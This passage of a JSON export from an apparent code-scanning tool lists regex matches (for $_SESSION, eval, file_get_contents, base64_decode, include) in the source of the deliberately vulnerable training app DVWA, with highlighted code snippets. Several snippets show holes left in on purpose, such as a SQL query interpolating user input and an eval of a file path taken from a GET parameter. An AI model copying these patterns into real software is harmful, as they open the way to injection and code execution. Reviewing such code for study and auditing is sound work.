database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>Something went wrong.</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 244,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 221,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 263,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 288,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 302,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 38,
"file": "/home/chris/src/DVWA-master/hackable/flags/fi.php",
"filetype": "php",
"search": "\\sbase64_decode\\s*\\(",
"match": "<span class=\"line-number\">15:</span> <span class=\"token variable\">$line3</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"3.) Romeo, Romeo! Wherefore art thou Romeo?\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$line3</span> <span class=\"token operator\">=</span> \"<span class=\"token operator\">-</span><span class=\"token operator\">-</span>LINE HIDDEN <span class=\"token comment\" spellcheck=\"true\">;)--\";</span>\n<span class=\"line-number\">17:</span> echo <span class=\"token variable\">$line3</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"\\n\\n<br /><br />\\n\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> <span class=\"token variable\">$line4</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"NC4pI\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"FRoZSBwb29s\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"IG9uIH\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"RoZSByb29mIG1\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"1c3QgaGF\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"2ZSBh\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"IGxlY\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"Wsu\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">20:</span> echo <span class=\"token function\">base64_decode</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$line4</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> <span class=\"token operator\"><</span>!<span class=\"token operator\">-</span><span class=\"token operator\">-</span> <span class=\"token number\">5</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">)</span> The world isn<span class=\"token string\">'t run by weapons anymore, or energy, or money. It'</span>s run by little ones <span class=\"token operator\">and</span> zeroes<span class=\"token punctuation\">,</span> little bits of data<span class=\"token punctuation\">.</span> It's all just electrons<span class=\"token punctuation\">.</span> <span class=\"token operator\">-</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>\n<span class=\"line-number\">25:</span> ",
"line": 20,
"start": 15,
"end": 26,
"severity": "unknown",
"note": ""
},
{
"id": 32,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\sfile\\s*\\(",
"match": "<span class=\"line-number\">17:</span> \treturn <span class=\"token string\">'0.6'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> }\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> PHPIDS Log parsing function\n<span class=\"line-number\">21:</span> function <span class=\"token function\">dvwaReadIdsLog</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">22:</span> \t<span class=\"token variable\">$file_array</span> <span class=\"token operator\">=</span> <span class=\"token function\">file</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS_LOG <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token function\">foreach</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file_array</span> as <span class=\"token variable\">$line_number</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$line</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$line</span> <span class=\"token operator\">=</span> <span class=\"token function\">explode</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\",\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$line</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 22,
"start": 17,
"end": 28,
"severity": "unknown",
"note": ""
},
{
"id": 42,
"file": "/home/chris/src/DVWA-master/instructions.php",
"filetype": "php",
"search": "\\sfile_get_contents\\s*\\(",
"match": "<span class=\"line-number\">21:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$selectedDocId</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$docs</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$selectedDocId</span> <span class=\"token operator\">=</span> <span class=\"token string\">'readme'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> }\n<span class=\"line-number\">24:</span> <span class=\"token variable\">$readFile</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$docs</span><span class=\"token punctuation\">[</span> <span class=\"token variable\">$selectedDocId</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'file'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"highlight\"><span class=\"line-number\">26:</span> <span class=\"token variable\">$instructions</span> <span class=\"token operator\">=</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT<span class=\"token punctuation\">.</span><span class=\"token variable\">$readFile</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">27:</span> \n<span class=\"line-number\">28:</span> function <span class=\"token function\">urlReplace</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$matches</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">29:</span> \treturn <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$matches</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">30:</span> }\n<span class=\"line-number\">31:</span> ",
"line": 26,
"start": 21,
"end": 32,
"severity": "unknown",
"note": ""
},
{
"id": 277,
"file": "/home/chris/src/DVWA-master/vulnerabilities/view_help.php",
"filetype": "php",
"search": "\\sfile_get_contents\\s*\\(",
"match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">ob_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> <span class=\"token function\">eval</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'?>'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/{$id}/help/help.php\"</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'<?php '</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$help</span> <span class=\"token operator\">=</span> <span class=\"token function\">ob_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token function\">ob_end_clean</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"\n<span class=\"line-number\">20:</span> <span class=\"token operator\"><</span>div class<span class=\"token operator\">=</span>\\<span class=\"token string\">\"body_padded\\\"</span><span class=\"token operator\">></span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 33,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\sfopen\\s*\\(",
"match": "<span class=\"line-number\">39:</span> }\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Clear PHPIDS log\n<span class=\"line-number\">42:</span> function <span class=\"token function\">dvwaClearIdsLog</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\t{\n<span class=\"line-number\">43:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'clear_log'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">44:</span> \t\t<span class=\"token variable\">$fp</span> <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS_LOG<span class=\"token punctuation\">,</span> w <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">45:</span> \t\t<span class=\"token function\">fclose</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$fp</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">46:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS log cleared\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">47:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \t}\n<span class=\"line-number\">49:</span> }",
"line": 44,
"start": 39,
"end": 50,
"severity": "unknown",
"note": ""
},
{
"id": 1,
"file": "/home/chris/src/DVWA-master/about.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">46:</span> \t<span class=\"token operator\"><</span>h2<span class=\"token operator\">></span>License<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Damn Vulnerable Web Application <span class=\"token punctuation\">(</span>DVWA<span class=\"token punctuation\">)</span> is free software<span class=\"token punctuation\">:</span> you can redistribute it <span class=\"token operator\">and</span><span class=\"token operator\">/</span><span class=\"token operator\">or</span> modify\n<span class=\"line-number\">48:</span> \tit under the terms of the GNU General Public License as published by\n<span class=\"line-number\">49:</span> \tthe Free Software Foundation<span class=\"token punctuation\">,</span> either version <span class=\"token number\">3</span> of the License<span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span>\n<span class=\"line-number\">50:</span> \t<span class=\"token punctuation\">(</span>at your option<span class=\"token punctuation\">)</span> any later version<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The PHPIDS library is included<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> good faith<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> this DVWA distribution<span class=\"token punctuation\">.</span> The operation of PHPIDS is provided without support from the DVWA team<span class=\"token punctuation\">.</span> It is licensed under <span class=\"token operator\"><</span>a href<span class=\"token operator\">=</span>\\<span class=\"token string\">\"\"</span> <span class=\"token punctuation\">.</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"instructions.php?doc=PHPIDS-license\\\"</span><span class=\"token operator\">></span>separate terms<span class=\"token operator\"><</span><span class=\"token operator\">/</span>a<span class=\"token operator\">></span> <span class=\"token keyword\">to</span> the DVWA code<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\"><</span>h2<span class=\"token operator\">></span>Development<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>\n<span class=\"line-number\">54:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Everyone is welcome <span class=\"token keyword\">to</span> contribute <span class=\"token operator\">and</span> help make DVWA as successful as it can be<span class=\"token punctuation\">.</span> All contributors can have their name <span class=\"token operator\">and</span> link <span class=\"token punctuation\">(</span><span class=\"token keyword\">if</span> they wish<span class=\"token punctuation\">)</span> placed <span class=\"token keyword\">in</span> the credits section<span class=\"token punctuation\">.</span> <span class=\"token keyword\">To</span> contribute pick an Issue from the Project Home <span class=\"token keyword\">to</span> work on <span class=\"token operator\">or</span> submit a patch <span class=\"token keyword\">to</span> the Issues list<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">55:</span> <span class=\"token operator\"><</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span>\\n\"<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">56:</span> ",
"line": 51,
"start": 46,
"end": 57,
"severity": "unknown",
"note": ""
},
{
"id": 25,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">5:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> }\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">session_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Creates a 'Full Path Disclosure' vuln.</span>\n<span class=\"line-number\">9:</span> \n<span class=\"highlight\"><span class=\"line-number\">10:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Include configs</span>\n<span class=\"line-number\">11:</span> require_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'config/config.inc.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> <span class=\"token function\">require_once</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'dvwaPhpIds.inc.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Declare the <span class=\"token variable\">$html</span> variable\n<span class=\"line-number\">15:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$html</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 10,
"start": 5,
"end": 16,
"severity": "unknown",
"note": ""
},
{
"id": 34,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\sinclude",
